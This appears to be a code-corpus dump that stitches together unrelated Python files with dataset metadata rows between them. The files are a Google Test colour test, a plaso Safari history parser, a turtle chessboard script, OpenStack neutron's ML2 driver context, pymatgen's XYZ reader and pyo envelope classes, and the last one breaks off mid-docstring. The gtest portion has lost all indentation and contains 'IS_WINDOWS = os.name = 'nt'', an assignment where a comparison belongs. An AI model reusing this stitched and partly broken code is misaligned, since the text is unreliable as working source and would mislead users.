# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that Google Test correctly determines whether to use colors."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import gtest_test_utils
IS_WINDOWS = os.name = 'nt'
COLOR_ENV_VAR = 'GTEST_COLOR'
COLOR_FLAG = 'gtest_color'
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_color_test_')
def SetEnvVar(env_var, value):
"""Sets the env variable to 'value'; unsets it when 'value' is None."""
if value is not None:
os.environ[env_var] = value
elif env_var in os.environ:
del os.environ[env_var]
def UsesColor(term, color_env_var, color_flag):
"""Runs gtest_color_test_ and returns its exit code."""
SetEnvVar('TERM', term)
SetEnvVar(COLOR_ENV_VAR, color_env_var)
if color_flag is None:
args = []
else:
args = ['--%s=%s' % (COLOR_FLAG, color_flag)]
p = gtest_test_utils.Subprocess([COMMAND] + args)
return not p.exited or p.exit_code
class GTestColorTest(gtest_test_utils.TestCase):
def testNoEnvVarNoFlag(self):
"""Tests the case when there's neither GTEST_COLOR nor --gtest_color."""
if not IS_WINDOWS:
self.assert_(not UsesColor('dumb', None, None))
self.assert_(not UsesColor('emacs', None, None))
self.assert_(not UsesColor('xterm-mono', None, None))
self.assert_(not UsesColor('unknown', None, None))
self.assert_(not UsesColor(None, None, None))
self.assert_(UsesColor('linux', None, None))
self.assert_(UsesColor('cygwin', None, None))
self.assert_(UsesColor('xterm', None, None))
self.assert_(UsesColor('xterm-color', None, None))
self.assert_(UsesColor('xterm-256color', None, None))
def testFlagOnly(self):
"""Tests the case when there's --gtest_color but not GTEST_COLOR."""
self.assert_(not UsesColor('dumb', None, 'no'))
self.assert_(not UsesColor('xterm-color', None, 'no'))
if not IS_WINDOWS:
self.assert_(not UsesColor('emacs', None, 'auto'))
self.assert_(UsesColor('xterm', None, 'auto'))
self.assert_(UsesColor('dumb', None, 'yes'))
self.assert_(UsesColor('xterm', None, 'yes'))
def testEnvVarOnly(self):
"""Tests the case when there's GTEST_COLOR but not --gtest_color."""
self.assert_(not UsesColor('dumb', 'no', None))
self.assert_(not UsesColor('xterm-color', 'no', None))
if not IS_WINDOWS:
self.assert_(not UsesColor('dumb', 'auto', None))
self.assert_(UsesColor('xterm-color', 'auto', None))
self.assert_(UsesColor('dumb', 'yes', None))
self.assert_(UsesColor('xterm-color', 'yes', None))
def testEnvVarAndFlag(self):
"""Tests the case when there are both GTEST_COLOR and --gtest_color."""
self.assert_(not UsesColor('xterm-color', 'no', 'no'))
self.assert_(UsesColor('dumb', 'no', 'yes'))
self.assert_(UsesColor('xterm-color', 'no', 'auto'))
def testAliasesOfYesAndNo(self):
"""Tests using aliases in specifying --gtest_color."""
self.assert_(UsesColor('dumb', None, 'true'))
self.assert_(UsesColor('dumb', None, 'YES'))
self.assert_(UsesColor('dumb', None, 'T'))
self.assert_(UsesColor('dumb', None, '1'))
self.assert_(not UsesColor('xterm', None, 'f'))
self.assert_(not UsesColor('xterm', None, 'false'))
self.assert_(not UsesColor('xterm', None, '0'))
self.assert_(not UsesColor('xterm', None, 'unknown'))
if __name__ == '__main__':
gtest_test_utils.Main()
| apache-2.0 | 5,851,284,731,570,305,000 | 36.776923 | 76 | 0.69212 | false |
joachimmetz/plaso | plaso/parsers/plist_plugins/safari.py | 2 | 3592 | # -*- coding: utf-8 -*-
"""Plist parser plugin for Safari history plist files."""
from dfdatetime import cocoa_time as dfdatetime_cocoa_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
from plaso.parsers import plist
from plaso.parsers.plist_plugins import interface
class SafariHistoryEventData(events.EventData):
"""Safari history event data.
Attributes:
display_title (str): display title of the webpage visited.
title (str): title of the webpage visited.
url (str): URL visited.
visit_count (int): number of times the website was visited.
was_http_non_get (bool): True if the webpage was visited using a non-GET
HTTP request.
"""
DATA_TYPE = 'safari:history:visit'
def __init__(self):
"""Initializes event data."""
super(SafariHistoryEventData, self).__init__(data_type=self.DATA_TYPE)
self.display_title = None
self.title = None
self.url = None
self.visit_count = None
self.was_http_non_get = None
class SafariHistoryPlugin(interface.PlistPlugin):
"""Plist parser plugin for Safari history plist files."""
NAME = 'safari_history'
DATA_FORMAT = 'Safari history plist file'
PLIST_PATH_FILTERS = frozenset([
interface.PlistPathFilter('History.plist')])
PLIST_KEYS = frozenset(['WebHistoryDates', 'WebHistoryFileVersion'])
# pylint: disable=arguments-differ
def _ParsePlist(self, parser_mediator, match=None, **unused_kwargs):
"""Extracts Safari history items.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
match (Optional[dict[str: object]]): keys extracted from PLIST_KEYS.
"""
format_version = match.get('WebHistoryFileVersion', None)
if format_version != 1:
parser_mediator.ProduceExtractionWarning(
'unsupported Safari history version: {0!s}'.format(format_version))
return
if 'WebHistoryDates' not in match:
return
for history_entry in match.get('WebHistoryDates', {}):
last_visited_date = history_entry.get('lastVisitedDate', None)
if last_visited_date is None:
parser_mediator.ProduceExtractionWarning('missing last visited date')
continue
try:
# Last visited date is a string containing a floating point value.
timestamp = float(last_visited_date)
except (TypeError, ValueError):
parser_mediator.ProduceExtractionWarning(
'unable to convert last visited date {0:s}'.format(
last_visited_date))
continue
display_title = history_entry.get('displayTitle', None)
event_data = SafariHistoryEventData()
if display_title != event_data.title:
event_data.display_title = display_title
event_data.title = history_entry.get('title', None)
event_data.url = history_entry.get('', None)
event_data.visit_count = history_entry.get('visitCount', None)
event_data.was_http_non_get = history_entry.get(
'lastVisitWasHTTPNonGet', None)
# Convert the floating point value to an integer.
# TODO: add support for the fractional part of the floating point value.
timestamp = int(timestamp)
date_time = dfdatetime_cocoa_time.CocoaTime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_LAST_VISITED)
parser_mediator.ProduceEventWithEventData(event, event_data)
plist.PlistParser.RegisterPlugin(SafariHistoryPlugin)
| apache-2.0 | 8,460,172,211,647,911,000 | 34.564356 | 78 | 0.697105 | false |
Valka7a/python-playground | python-course-softuni/introduction-python3/lecture-one-excercises/ex7.py | 1 | 1947 | import turtle
# Get user's input
board_size = input('Enter bord size: ')
# Validate user's input
try:
board_size = int(board_size)
if board_size < 8:
raise Exception('Board size cannot be less then 8.')
except ValueError:
print('Invalid input!')
exit()
except Exception as error:
print(error)
exit()
# Configure turtle's color based on current row and col
def configure_turtle_color(row, col):
if row % 2 == 1:
col += 1
if col % 2 == 0:
turtle.color('black')
return
turtle.color('white')
# Draw single square with the size provided
def draw_square(size, fill=True):
if fill:
turtle.begin_fill()
for _ in range(4):
turtle.forward(size)
turtle.left(90)
if fill:
turtle.end_fill()
# Draw borders around the board,
# so it can be seen properly with
# any background color
def draw_board_borders():
turtle.penup()
turtle.color('black')
turtle.goto(-1, -1)
turtle.pendown()
draw_square(board_size + 2, False)
turtle.penup()
turtle.color('white')
turtle.goto(-2, -2)
turtle.pendown()
draw_square(board_size + 4, False)
# Draw the chess board
def draw_chess_board():
item_length = board_size / 8
row = x_coord = y_coord = 0
for number in range(1, 65):
configure_turtle_color(row, number)
turtle.penup()
turtle.goto(x_coord, y_coord)
turtle.pendown()
draw_square(item_length)
x_coord += item_length
if number % 8 == 0:
row += 1
x_coord = 0
y_coord += item_length
draw_board_borders()
# Configure the turtle
turtle.speed('fastest')
turtle.bgcolor('brown')
# Draw
draw_chess_board()
# Move the turtle to the side,
# so the chessboard is seen
# better when it's with smaller size
turtle.penup()
turtle.goto(-10, -10)
# Wait for user's click to exit
turtle.exitonclick() | mit | -3,479,351,856,676,497,400 | 17.912621 | 60 | 0.611197 | false |
subramani95/neutron | neutron/plugins/ml2/driver_context.py | 6 | 4610 | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.openstack.common import jsonutils
from neutron.plugins.ml2 import db
from neutron.plugins.ml2 import driver_api as api
class MechanismDriverContext(object):
"""MechanismDriver context base class."""
def __init__(self, plugin, plugin_context):
self._plugin = plugin
# This temporarily creates a reference loop, but the
# lifetime of PortContext is limited to a single
# method call of the plugin.
self._plugin_context = plugin_context
class NetworkContext(MechanismDriverContext, api.NetworkContext):
def __init__(self, plugin, plugin_context, network,
original_network=None):
super(NetworkContext, self).__init__(plugin, plugin_context)
self._network = network
self._original_network = original_network
self._segments = db.get_network_segments(plugin_context.session,
network['id'])
@property
def current(self):
return self._network
@property
def original(self):
return self._original_network
@property
def network_segments(self):
return self._segments
class SubnetContext(MechanismDriverContext, api.SubnetContext):
def __init__(self, plugin, plugin_context, subnet, original_subnet=None):
super(SubnetContext, self).__init__(plugin, plugin_context)
self._subnet = subnet
self._original_subnet = original_subnet
@property
def current(self):
return self._subnet
@property
def original(self):
return self._original_subnet
class PortContext(MechanismDriverContext, api.PortContext):
def __init__(self, plugin, plugin_context, port, network,
original_port=None):
super(PortContext, self).__init__(plugin, plugin_context)
self._port = port
self._original_port = original_port
self._network_context = NetworkContext(plugin, plugin_context,
network)
self._binding = db.ensure_port_binding(plugin_context.session,
port['id'])
if original_port:
self._original_bound_segment_id = self._binding.segment
self._original_bound_driver = self._binding.driver
else:
self._original_bound_segment_id = None
self._original_bound_driver = None
self._new_port_status = None
@property
def current(self):
return self._port
@property
def original(self):
return self._original_port
@property
def network(self):
return self._network_context
@property
def bound_segment(self):
id = self._binding.segment
if id:
for segment in self._network_context.network_segments:
if segment[api.ID] == id:
return segment
@property
def original_bound_segment(self):
if self._original_bound_segment_id:
for segment in self._network_context.network_segments:
if segment[api.ID] == self._original_bound_segment_id:
return segment
@property
def bound_driver(self):
return self._binding.driver
@property
def original_bound_driver(self):
return self._original_bound_driver
def host_agents(self, agent_type):
return self._plugin.get_agents(self._plugin_context,
filters={'agent_type': [agent_type],
'host': [self._binding.host]})
def set_binding(self, segment_id, vif_type, vif_details,
status=None):
# TODO(rkukura) Verify binding allowed, segment in network
self._binding.segment = segment_id
self._binding.vif_type = vif_type
self._binding.vif_details = jsonutils.dumps(vif_details)
self._new_port_status = status
| apache-2.0 | 5,014,478,164,792,545,000 | 33.148148 | 78 | 0.619957 | false |
montoyjh/pymatgen | pymatgen/io/xyz.py | 5 | 4144 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import re
from pymatgen.core.structure import Molecule
from monty.io import zopen
"""
Module implementing an XYZ file object class.
"""
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "Apr 17, 2012"
class XYZ:
"""
Basic class for importing and exporting Molecules or Structures in XYZ
format.
Args:
mol: Input molecule or list of molecules
.. note::
Exporting periodic structures in the XYZ format will lose information
about the periodicity. Essentially, only cartesian coordinates are
written in this format and no information is retained about the
lattice.
"""
def __init__(self, mol, coord_precision=6):
if isinstance(mol, Molecule) or not isinstance(mol, list):
self._mols = [mol]
else:
self._mols = mol
self.precision = coord_precision
@property
def molecule(self):
"""
Returns molecule associated with this XYZ. In case multiple frame
XYZ, returns the last frame.
"""
return self._mols[-1]
@property
def all_molecules(self):
"""
Returns all the frames of molecule associated with this XYZ.
"""
return self._mols
@staticmethod
def _from_frame_string(contents):
"""
Convert a single frame XYZ string to a molecule
"""
lines = contents.split("\n")
num_sites = int(lines[0])
coords = []
sp = []
coord_patt = re.compile(
r"(\w+)\s+([0-9\-\+\.eEdD]+)\s+([0-9\-\+\.eEdD]+)\s+([0-9\-\+\.eEdD]+)"
)
for i in range(2, 2 + num_sites):
m = coord_patt.search(lines[i])
if m:
sp.append(m.group(1)) # this is 1-indexed
# this is 0-indexed
# in case of 0.0D+00 or 0.00d+01 old double precision writing
# replace d or D by e for ten power exponent
xyz = [val.lower().replace("d", "e") for val in m.groups()[1:4]]
coords.append([float(val) for val in xyz])
return Molecule(sp, coords)
@staticmethod
def from_string(contents):
"""
Creates XYZ object from a string.
Args:
contents: String representing an XYZ file.
Returns:
XYZ object
"""
if contents[-1] != "\n":
contents += "\n"
white_space = r"[ \t\r\f\v]"
natoms_line = white_space + r"*\d+" + white_space + r"*\n"
comment_line = r"[^\n]*\n"
coord_lines = r"(\s*\w+\s+[0-9\-\+\.eEdD]+\s+[0-9\-\+\.eEdD]+\s+[0-9\-\+\.eEdD]+\s*\n)+"
frame_pattern_text = natoms_line + comment_line + coord_lines
pat = re.compile(frame_pattern_text, re.MULTILINE)
mols = []
for xyz_match in pat.finditer(contents):
xyz_text = xyz_match.group(0)
mols.append(XYZ._from_frame_string(xyz_text))
return XYZ(mols)
@staticmethod
def from_file(filename):
"""
Creates XYZ object from a file.
Args:
filename: XYZ filename
Returns:
XYZ object
"""
with zopen(filename) as f:
return XYZ.from_string(f.read())
def _frame_str(self, frame_mol):
output = [str(len(frame_mol)), frame_mol.composition.formula]
fmtstr = "{{}} {{:.{0}f}} {{:.{0}f}} {{:.{0}f}}".format(self.precision)
for site in frame_mol:
output.append(fmtstr.format(site.specie, site.x, site.y, site.z))
return "\n".join(output)
def __str__(self):
return "\n".join([self._frame_str(mol) for mol in self._mols])
def write_file(self, filename):
"""
Writes XYZ to file.
Args:
filename: File name of output file.
"""
with zopen(filename, "wt") as f:
f.write(self.__str__())
| mit | -1,933,247,107,292,179,200 | 29.028986 | 96 | 0.545849 | false |
jpippy/pyo | pyolib/controls.py | 5 | 24741 | """
Objects designed to create parameter's control at audio rate.
These objects can be used to create envelopes, line segments
and conversion from python number to audio signal.
The audio streams of these objects can't be sent to the output
soundcard.
"""
"""
Copyright 2009-2015 Olivier Belanger
This file is part of pyo, a python module to help digital signal
processing script creation.
pyo is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
pyo is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with pyo. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
from _core import *
from _maps import *
from _widgets import createGraphWindow
from types import ListType, TupleType
######################################################################
### Controls
######################################################################
class Fader(PyoObject):
"""
Fadein - fadeout envelope generator.
Generate an amplitude envelope between 0 and 1 with control on fade
times and total duration of the envelope.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
fadein : float, optional
Rising time of the envelope in seconds. Defaults to 0.01.
fadeout : float, optional
Falling time of the envelope in seconds. Defaults to 0.1.
dur : float, optional
Total duration of the envelope. Defaults to 0, which means wait
for the stop() method to start the fadeout.
.. note::
The out() method is bypassed. Fader's signal can not be sent to audio outs.
The play() method starts the envelope.
The stop() calls the envelope's release phase if `dur` = 0.
>>> s = Server().boot()
>>> s.start()
>>> f = Fader(fadein=0.5, fadeout=0.5, dur=2, mul=.5)
>>> a = BrownNoise(mul=f).mix(2).out()
>>> def repeat():
... f.play()
>>> pat = Pattern(function=repeat, time=2).play()
"""
def __init__(self, fadein=0.01, fadeout=0.1, dur=0, mul=1, add=0):
pyoArgsAssert(self, "nnnOO", fadein, fadeout, dur, mul, add)
PyoObject.__init__(self, mul, add)
self._fadein = fadein
self._fadeout = fadeout
self._dur = dur
fadein, fadeout, dur, mul, add, lmax = convertArgsToLists(fadein, fadeout, dur, mul, add)
self._base_objs = [Fader_base(wrap(fadein,i), wrap(fadeout,i), wrap(dur,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setFadein(self, x):
"""
Replace the `fadein` attribute.
:Args:
x : float
new `fadein` attribute.
"""
pyoArgsAssert(self, "n", x)
self._fadein = x
x, lmax = convertArgsToLists(x)
[obj.setFadein(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setFadeout(self, x):
"""
Replace the `fadeout` attribute.
:Args:
x : float
new `fadeout` attribute.
"""
pyoArgsAssert(self, "n", x)
self._fadeout = x
x, lmax = convertArgsToLists(x)
[obj.setFadeout(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDur(self, x):
"""
Replace the `dur` attribute.
:Args:
x : float
new `dur` attribute.
"""
pyoArgsAssert(self, "n", x)
self._dur = x
x, lmax = convertArgsToLists(x)
[obj.setDur(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 10., 'lin', 'fadein', self._fadein, dataOnly=True),
SLMap(0, 10., 'lin', 'fadeout', self._fadeout, dataOnly=True),
SLMap(0, 20., 'lin', 'dur', self._dur, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def fadein(self):
"""float. Rising time of the envelope in seconds."""
return self._fadein
@fadein.setter
def fadein(self, x): self.setFadein(x)
@property
def fadeout(self):
"""float. Falling time of the envelope in seconds."""
return self._fadeout
@fadeout.setter
def fadeout(self, x): self.setFadeout(x)
@property
def dur(self):
"""float. Total duration of the envelope."""
return self._dur
@dur.setter
def dur(self, x): self.setDur(x)
class Adsr(PyoObject):
"""
Attack - Decay - Sustain - Release envelope generator.
Calculates the classical ADSR envelope using linear segments.
Duration can be set to 0 to give an infinite sustain. In this
case, the stop() method calls the envelope release part.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
attack : float, optional
Duration of the attack phase in seconds. Defaults to 0.01.
decay : float, optional
Duration of the decay in seconds. Defaults to 0.05.
sustain : float, optional
Amplitude of the sustain phase. Defaults to 0.707.
release : float, optional
Duration of the release in seconds. Defaults to 0.1.
dur : float, optional
Total duration of the envelope. Defaults to 0, which means wait
for the stop() method to start the release phase.
.. note::
The out() method is bypassed. Adsr's signal can not be sent to audio outs.
The play() method starts the envelope.
The stop() calls the envelope's release phase if `dur` = 0.
>>> s = Server().boot()
>>> s.start()
>>> f = Adsr(attack=.01, decay=.2, sustain=.5, release=.1, dur=2, mul=.5)
>>> a = BrownNoise(mul=f).mix(2).out()
>>> def repeat():
... f.play()
>>> pat = Pattern(function=repeat, time=2).play()
"""
def __init__(self, attack=0.01, decay=0.05, sustain=0.707, release=0.1, dur=0, mul=1, add=0):
pyoArgsAssert(self, "nnnnnOO", attack, decay, sustain, release, dur, mul, add)
PyoObject.__init__(self, mul, add)
self._attack = attack
self._decay = decay
self._sustain = sustain
self._release = release
self._dur = dur
attack, decay, sustain, release, dur, mul, add, lmax = convertArgsToLists(attack, decay, sustain, release, dur, mul, add)
self._base_objs = [Adsr_base(wrap(attack,i), wrap(decay,i), wrap(sustain,i), wrap(release,i), wrap(dur,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setAttack(self, x):
"""
Replace the `attack` attribute.
:Args:
x : float
new `attack` attribute.
"""
pyoArgsAssert(self, "n", x)
self._attack = x
x, lmax = convertArgsToLists(x)
[obj.setAttack(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDecay(self, x):
"""
Replace the `decay` attribute.
:Args:
x : float
new `decay` attribute.
"""
pyoArgsAssert(self, "n", x)
self._decay = x
x, lmax = convertArgsToLists(x)
[obj.setDecay(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setSustain(self, x):
"""
Replace the `sustain` attribute.
:Args:
x : float
new `sustain` attribute.
"""
pyoArgsAssert(self, "n", x)
self._sustain = x
x, lmax = convertArgsToLists(x)
[obj.setSustain(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setRelease(self, x):
"""
Replace the `sustain` attribute.
:Args:
x : float
new `sustain` attribute.
"""
pyoArgsAssert(self, "n", x)
self._release = x
x, lmax = convertArgsToLists(x)
[obj.setRelease(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDur(self, x):
"""
Replace the `dur` attribute.
:Args:
x : float
new `dur` attribute.
"""
pyoArgsAssert(self, "n", x)
self._dur = x
x, lmax = convertArgsToLists(x)
[obj.setDur(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 5, 'lin', 'attack', self._attack, dataOnly=True),
SLMap(0, 5, 'lin', 'decay', self._decay, dataOnly=True),
SLMap(0, 1, 'lin', 'sustain', self._sustain, dataOnly=True),
SLMap(0, 10, 'lin', 'release', self._release, dataOnly=True),
SLMap(0, 20., 'lin', 'dur', self._dur, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def attack(self):
"""float. Duration of the attack phase in seconds."""
return self._attack
@attack.setter
def attack(self, x): self.setAttack(x)
@property
def decay(self):
"""float. Duration of the decay phase in seconds."""
return self._decay
@decay.setter
def decay(self, x): self.setDecay(x)
@property
def sustain(self):
"""float. Amplitude of the sustain phase."""
return self._sustain
@sustain.setter
def sustain(self, x): self.setSustain(x)
@property
def release(self):
"""float. Duration of the release phase in seconds."""
return self._release
@release.setter
def release(self, x): self.setRelease(x)
@property
def dur(self):
"""float. Total duration of the envelope."""
return self._dur
@dur.setter
def dur(self, x): self.setDur(x)
class Linseg(PyoObject):
"""
Trace a series of line segments between specified break-points.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
list : list of tuples
Points used to construct the line segments. Each tuple is a
new point in the form (time, value).
Times are given in seconds and must be in increasing order.
loop : boolean, optional
Looping mode. Defaults to False.
initToFirstVal : boolean, optional
If True, audio buffer will be filled at initialization with the
first value of the line. Defaults to False.
.. note::
The out() method is bypassed. Linseg's signal can not be sent to audio outs.
>>> s = Server().boot()
>>> s.start()
>>> l = Linseg([(0,500),(.03,1000),(.1,700),(1,500),(2,500)], loop=True)
>>> a = Sine(freq=l, mul=.3).mix(2).out()
>>> # then call:
>>> l.play()
"""
def __init__(self, list, loop=False, initToFirstVal=False, mul=1, add=0):
pyoArgsAssert(self, "lbbOO", list, loop, initToFirstVal, mul, add)
PyoObject.__init__(self, mul, add)
self._list = list
self._loop = loop
initToFirstVal, loop, mul, add, lmax = convertArgsToLists(initToFirstVal, loop, mul, add)
if type(list[0]) != ListType:
self._base_objs = [Linseg_base(list, wrap(loop,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
else:
listlen = len(list)
lmax = max(listlen, lmax)
self._base_objs = [Linseg_base(wrap(list,i), wrap(loop,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setList(self, x):
"""
Replace the `list` attribute.
:Args:
x : list of tuples
new `list` attribute.
"""
pyoArgsAssert(self, "l", x)
self._list = x
if type(x[0]) != ListType:
[obj.setList(x) for i, obj in enumerate(self._base_objs)]
else:
[obj.setList(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def replace(self, x):
"""
Alias for `setList` method.
:Args:
x : list of tuples
new `list` attribute.
"""
self.setList(x)
def getPoints(self):
return self._list
def setLoop(self, x):
"""
Replace the `loop` attribute.
:Args:
x : boolean
new `loop` attribute.
"""
pyoArgsAssert(self, "b", x)
self._loop = x
x, lmax = convertArgsToLists(x)
[obj.setLoop(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def graph(self, xlen=None, yrange=None, title=None, wxnoserver=False):
"""
Opens a grapher window to control the shape of the envelope.
When editing the grapher with the mouse, the new set of points
will be send to the object on mouse up.
Ctrl+C with focus on the grapher will copy the list of points to the
clipboard, giving an easy way to insert the new shape in a script.
:Args:
xlen : float, optional
Set the maximum value of the X axis of the graph. If None, the
maximum value is retrieve from the current list of points.
yrange : tuple, optional
Set the min and max values of the Y axis of the graph. If
None, min and max are retrieve from the current list of points.
title : string, optional
Title of the window. If none is provided, the name of the
class is used.
wxnoserver : boolean, optional
With wxPython graphical toolkit, if True, tells the
interpreter that there will be no server window.
If `wxnoserver` is set to True, the interpreter will not wait for the
server GUI before showing the controller window.
"""
if xlen == None:
xlen = float(self._list[-1][0])
else:
xlen = float(xlen)
if yrange == None:
ymin = float(min([x[1] for x in self._list]))
ymax = float(max([x[1] for x in self._list]))
if ymin == ymax:
yrange = (0, ymax)
else:
yrange = (ymin, ymax)
createGraphWindow(self, 0, xlen, yrange, title, wxnoserver)
@property
def list(self):
"""float. List of points (time, value)."""
return self._list
@list.setter
def list(self, x): self.setList(x)
@property
def loop(self):
"""boolean. Looping mode."""
return self._loop
@loop.setter
def loop(self, x): self.setLoop(x)
class Expseg(PyoObject):
"""
Trace a series of exponential segments between specified break-points.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
list : list of tuples
Points used to construct the line segments. Each tuple is a
new point in the form (time, value).
Times are given in seconds and must be in increasing order.
loop : boolean, optional
Looping mode. Defaults to False.
exp : float, optional
Exponent factor. Used to control the slope of the curves.
Defaults to 10.
inverse : boolean, optional
If True, downward slope will be inversed. Useful to create
biexponential curves. Defaults to True.
initToFirstVal : boolean, optional
If True, audio buffer will be filled at initialization with the
first value of the line. Defaults to False.
.. note::
The out() method is bypassed. Expseg's signal can not be sent to audio outs.
>>> s = Server().boot()
>>> s.start()
>>> l = Expseg([(0,500),(.03,1000),(.1,700),(1,500),(2,500)], loop=True)
>>> a = Sine(freq=l, mul=.3).mix(2).out()
>>> # then call:
>>> l.play()
"""
def __init__(self, list, loop=False, exp=10, inverse=True, initToFirstVal=False, mul=1, add=0):
pyoArgsAssert(self, "lbnbbOO", list, loop, exp, inverse, initToFirstVal, mul, add)
PyoObject.__init__(self, mul, add)
self._list = list
self._loop = loop
self._exp = exp
self._inverse = inverse
loop, exp, inverse, initToFirstVal, mul, add, lmax = convertArgsToLists(loop, exp, inverse, initToFirstVal, mul, add)
if type(list[0]) != ListType:
self._base_objs = [Expseg_base(list, wrap(loop,i), wrap(exp,i), wrap(inverse,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
else:
listlen = len(list)
lmax = max(listlen, lmax)
self._base_objs = [Expseg_base(wrap(list,i), wrap(loop,i), wrap(exp,i), wrap(inverse,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setList(self, x):
"""
Replace the `list` attribute.
:Args:
x : list of tuples
new `list` attribute.
"""
pyoArgsAssert(self, "l", x)
self._list = x
if type(x[0]) != ListType:
[obj.setList(x) for i, obj in enumerate(self._base_objs)]
else:
[obj.setList(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setLoop(self, x):
"""
Replace the `loop` attribute.
:Args:
x : boolean
new `loop` attribute.
"""
pyoArgsAssert(self, "b", x)
self._loop = x
x, lmax = convertArgsToLists(x)
[obj.setLoop(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setExp(self, x):
"""
Replace the `exp` attribute.
:Args:
x : float
new `exp` attribute.
"""
pyoArgsAssert(self, "n", x)
self._exp = x
x, lmax = convertArgsToLists(x)
[obj.setExp(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setInverse(self, x):
"""
Replace the `inverse` attribute.
:Args:
x : boolean
new `inverse` attribute.
"""
pyoArgsAssert(self, "b", x)
self._inverse = x
x, lmax = convertArgsToLists(x)
[obj.setInverse(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def replace(self, x):
"""
Alias for `setList` method.
:Args:
x : list of tuples
new `list` attribute.
"""
self.setList(x)
def getPoints(self):
return self._list
def graph(self, xlen=None, yrange=None, title=None, wxnoserver=False):
"""
Opens a grapher window to control the shape of the envelope.
When editing the grapher with the mouse, the new set of points
will be send to the object on mouse up.
Ctrl+C with focus on the grapher will copy the list of points to the
clipboard, giving an easy way to insert the new shape in a script.
:Args:
xlen : float, optional
Set the maximum value of the X axis of the graph. If None, the
maximum value is retrieve from the current list of points.
Defaults to None.
yrange : tuple, optional
Set the min and max values of the Y axis of the graph. If
None, min and max are retrieve from the current list of points.
Defaults to None.
title : string, optional
Title of the window. If none is provided, the name of the
class is used.
wxnoserver : boolean, optional
With wxPython graphical toolkit, if True, tells the
interpreter that there will be no server window.
